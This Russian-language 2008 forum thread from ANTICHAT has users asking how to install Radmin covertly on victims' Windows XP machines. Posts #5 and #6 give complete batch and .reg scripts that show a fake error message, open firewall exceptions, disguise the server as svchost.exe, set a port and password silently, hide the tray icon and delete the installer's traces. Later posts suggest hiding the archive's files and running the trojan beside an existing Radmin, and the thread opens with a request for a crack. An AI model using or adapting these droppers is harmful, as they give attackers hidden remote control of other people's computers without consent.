HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность > АнтиАдмин
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.07.2008, 23:25
metaN™®
Постоянный
Регистрация: 07.04.2008
Сообщений: 305
Провел на форуме:
1218795

Репутация: 176
Отправить сообщение для metaN™® с помощью ICQ
По умолчанию

Есть у кого нибуть крек или рабочий серийник для радмина 3.2?
 

  #2  
Старый 30.07.2008, 16:25
immortal16
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302

Репутация: 3
По умолчанию

что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?
 

  #3  
Старый 30.07.2008, 17:26
.dimoN.
Участник форума
Регистрация: 08.04.2008
Сообщений: 150
Провел на форуме:
3980762

Репутация: 136
По умолчанию

Цитата:
Сообщение от immortal16  
что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?
причем тут telnet к радмину? если ты хочешь чтоб в процессах не было r_server просто переименуй его например в svchost
 

  #4  
Старый 31.07.2008, 20:50
immortal16
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302

Репутация: 3
По умолчанию

да я его даже настроить не могу ! скачал готовый пак тут же на форуме !он сам распаковывается в систем!проста в viewerе есть такая функция телнет я думал мож ей надо как то воспользоваться ?мож кто расскажет как такой архивчик создать и пасс свой поставить!пишите в личку плз!
мож есть какие ниб другие способы проникнуть на комп (XP) кроме как троем?поделитесь!ну или хотя б че ниб предложите по сетевому хаку !
 

  #5  
Старый 08.08.2008, 15:38
immortal16
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302

Репутация: 3
По умолчанию

я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:


@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

а вот что в файле 111.reg?

а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!

Последний раз редактировалось immortal16; 08.08.2008 в 17:32..
 

  #6  
Старый 14.08.2008, 14:31
F3x111TsSL
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200

Репутация: 6
По умолчанию

у меня была трабла:
у человека на порту 4899 стоял r_server
я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах
настроил эти два через командную строку путем следующих команд:
%SYSTEMROOT%/help\svchost.exe /install /silence
%SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence
%SYSTEMROOT%/help\svchost.exe /start
и
%SYSTEMROOT%/config\svchost.exe /install /silence
%SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence
%SYSTEMROOT%/config\svchost.exe /start


в каждую директорию закидывал три файла:
svchost.exe
AdmDll.dll
raddrv.dll

собственно сама проблема с серверами на портах 4898 и 4897:
через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали.
после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала

версия сервера 2.2 версия клиента 3.2

при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает

как думаете в чем может быть проблема?

з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом (








Цитата:
Сообщение от immortal16  
я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:


@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

а вот что в файле 111.reg?

а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
содержание файла 111.reg
Цитата:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
факю по файлам бат и рег в первых двух постах этой темы



чтобы файлы удалялись прописываешь в бат файле в конце:
Цитата:
del xxx.xx
где xxx.xx название файла который надо удалить


лично у меня бат файл был следующего содержания:
Цитата:
@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
добавление в встроеный в винду файрвол исключения
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
открытие нужного порта (у меня без этого не всегда работало) во все том же файрволе:
netsh firewall add portopening TCP 4897 svchost
копируем имеющиеся ключи реестра в файлик 123.reg :
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
удаляем имеющиеся ключи реестра:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
копируем нужные файлы в нужную директорию:
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
добавляем в реестр то что нам надо из файлика 111.reg:
reg import 111.reg
regedit /s 111.reg
устанавливаем сервер без уведомлений пользователя:
"%SYSTEMROOT%/help\svchost.exe" /install /silence
настраиваем сервер на 5001 порт, ставим пароль 123 без уведомления пользователя:
"%SYSTEMROOT%/help\svchost.exe" /port:5001 /pass:123 /save /silence
запускаем сервер:
"%SYSTEMROOT%/help\svchost.exe" /start
удаляем все что мы использовали для установки:
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del start.bat

Последний раз редактировалось F3x111TsSL; 14.08.2008 в 16:04..
 

  #7  
Старый 14.08.2008, 17:15
F3x111TsSL
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200

Репутация: 6
По умолчанию

как вариант можно в архиве сделать все файлы кроме собственно батника скрытыми
много народу юзает проводник где по дефолту не показываются скрытые файлы...
 

  #8  
Старый 23.08.2008, 16:46
m-Xacker
Участник форума
Регистрация: 17.06.2008
Сообщений: 118
Провел на форуме:
160993

Репутация: 22
По умолчанию

На компе существует уже установленный радмин, после запуска радмина-трояна пароль и порт другие, старый радмин вырубился и незапускаеться. Вопросто такой можно ли использовать 2 радмина нормальный и трой одновременно , если да то как ???
 

  #9  
Старый 23.08.2008, 16:48
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от m-Xacker  
На компе существует уже установленный радмин, после запуска радмина-трояна пароль и порт другие, старый радмин вырубился и незапускаеться. Вопросто такой можно ли использовать 2 радмина нормальный и трой одновременно , если да то как ???
Юзать разные порты.
 

  #10  
Старый 23.08.2008, 17:45
m-Xacker
Участник форума
Регистрация: 17.06.2008
Сообщений: 118
Провел на форуме:
160993

Репутация: 22
По умолчанию

Цитата:
Сообщение от _Sniper_  
Юзать разные порты.
так я же написал что порт я установил другой

"C:\WINDOWS\Help\svchost.exe" /port:5001

Зы= кстати на виндовс сервер нужно прописывать конкретный путь

Или нужно в самом реестре устанавливать???
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ